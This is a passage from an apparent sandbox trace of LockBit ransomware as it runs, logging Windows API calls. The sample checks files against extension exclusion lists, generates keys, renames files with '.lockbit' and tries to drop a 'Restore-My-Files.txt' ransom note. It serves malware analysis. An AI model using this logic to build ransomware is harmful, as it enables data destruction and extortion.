Office\\CLIPART\\PUB60COR\\J0107484.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107484.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.944] malloc (_Size=0xa6) returned 0x77d7a8 [0141.944] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0141.945] free (_Block=0x77d7a8) [0141.945] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107484.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.945] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.945] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.945] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65eb5050, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1f40, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107488.WMF", cAlternateFileName="")) returned 1 [0141.945] lstrcmpiW (lpString1=".", lpString2="J0107488.WMF") returned -1 [0141.945] lstrcmpiW (lpString1="..", lpString2="J0107488.WMF") returned -1 [0141.945] PathFindExtensionW (pszPath="J0107488.WMF") returned=".WMF" [0141.945] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.945] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.945] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.945] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.945] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.945] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.945] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.945] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.945] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.945] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.945] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.945] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.945] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.945] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.946] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.946] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.946] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.946] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.946] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.946] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.946] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.946] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.946] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.946] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.946] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.946] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.946] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.946] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.946] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.946] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.946] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.946] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.946] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.946] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.946] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.946] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.946] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.946] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.946] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.946] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.946] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.946] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.947] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.947] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.947] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.947] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.947] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.947] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107488.WMF") returned 1 [0141.947] lstrcmpiW (lpString1="ntldr", lpString2="J0107488.WMF") returned 1 [0141.947] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107488.WMF") returned 1 [0141.947] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107488.WMF") returned -1 [0141.947] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107488.WMF") returned -1 [0141.947] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107488.WMF") returned 1 [0141.947] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107488.WMF") returned -1 [0141.947] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.947] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF") returned=".WMF" [0141.947] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.947] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.947] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.947] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.947] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.947] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.947] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.947] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.947] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.947] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.947] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.948] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.948] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.948] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.948] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.948] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.948] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.948] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.948] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.948] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.948] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.948] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.948] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.948] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.948] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.948] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.948] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.948] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.948] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF.lockbit") returned 72 [0141.948] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107488.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0141.949] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.949] malloc (_Size=0x40068) returned 0x3e70008 [0141.949] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=8000) returned 1 [0141.949] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.950] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0141.950] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.950] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0141.950] ReadFile (in: hFile=0x170, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0141.954] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.954] malloc (_Size=0xa6) returned 0x77d7a8 [0141.954] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0141.955] free (_Block=0x77d7a8) [0141.955] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.955] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.955] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.956] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x563ba0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4054, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107490.WMF", cAlternateFileName="")) returned 1 [0141.956] lstrcmpiW (lpString1=".", lpString2="J0107490.WMF") returned -1 [0141.956] lstrcmpiW (lpString1="..", lpString2="J0107490.WMF") returned -1 [0141.956] PathFindExtensionW (pszPath="J0107490.WMF") returned=".WMF" [0141.956] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.956] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.956] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.956] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.956] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.956] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.956] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.956] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.956] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.956] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.956] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.956] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.956] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.956] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.956] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.956] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.956] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.957] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.957] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.957] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.957] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.957] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.957] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.957] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.957] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.957] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.957] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.957] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.957] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.957] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.957] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.957] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.957] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.957] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.957] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.957] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.957] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.957] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.958] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.958] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.958] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.958] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.958] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.958] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.958] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.958] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.958] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.958] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107490.WMF") returned 1 [0141.958] lstrcmpiW (lpString1="ntldr", lpString2="J0107490.WMF") returned 1 [0141.958] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107490.WMF") returned 1 [0141.958] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107490.WMF") returned -1 [0141.958] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107490.WMF") returned -1 [0141.958] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107490.WMF") returned 1 [0141.958] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107490.WMF") returned -1 [0141.958] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.958] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF") returned=".WMF" [0141.958] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.958] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.958] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.958] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.958] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.958] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.958] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.959] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.959] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.959] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.959] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.959] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.959] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.959] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.959] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.959] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.959] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.959] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.959] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.959] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.959] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.959] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.959] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.959] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.959] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.959] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.959] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.959] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.959] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF.lockbit") returned 72 [0141.959] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107490.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0141.960] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.960] malloc (_Size=0x40068) returned 0x3df0008 [0141.960] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=16468) returned 1 [0141.960] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.961] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.961] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0141.961] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.961] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.961] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0141.961] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0141.965] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.965] malloc (_Size=0xa6) returned 0x77d7a8 [0141.965] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0141.966] free (_Block=0x77d7a8) [0141.966] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.966] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.966] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.966] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x563ba0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1acc, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107492.WMF", cAlternateFileName="")) returned 1 [0141.966] lstrcmpiW (lpString1=".", lpString2="J0107492.WMF") returned -1 [0141.966] lstrcmpiW (lpString1="..", lpString2="J0107492.WMF") returned -1 [0141.966] PathFindExtensionW (pszPath="J0107492.WMF") returned=".WMF" [0141.967] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.967] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.967] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.967] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.967] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.967] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.967] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.967] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.967] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.967] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.967] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.967] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.967] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.967] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.967] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.967] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.967] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.967] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.967] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.967] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.967] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.967] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.967] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.967] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.967] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.968] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.968] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.968] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.968] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.968] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.968] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.968] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.968] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.968] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.968] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.968] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.968] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.968] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.968] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.968] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.968] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.968] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.968] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.968] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.968] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.968] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.968] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.968] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107492.WMF") returned 1 [0141.969] lstrcmpiW (lpString1="ntldr", lpString2="J0107492.WMF") returned 1 [0141.969] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107492.WMF") returned 1 [0141.969] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107492.WMF") returned -1 [0141.969] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107492.WMF") returned -1 [0141.969] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107492.WMF") returned 1 [0141.969] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107492.WMF") returned -1 [0141.969] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.969] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107492.WMF") returned=".WMF" [0141.969] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.969] lstrcmpiW (lpString1=".zip", 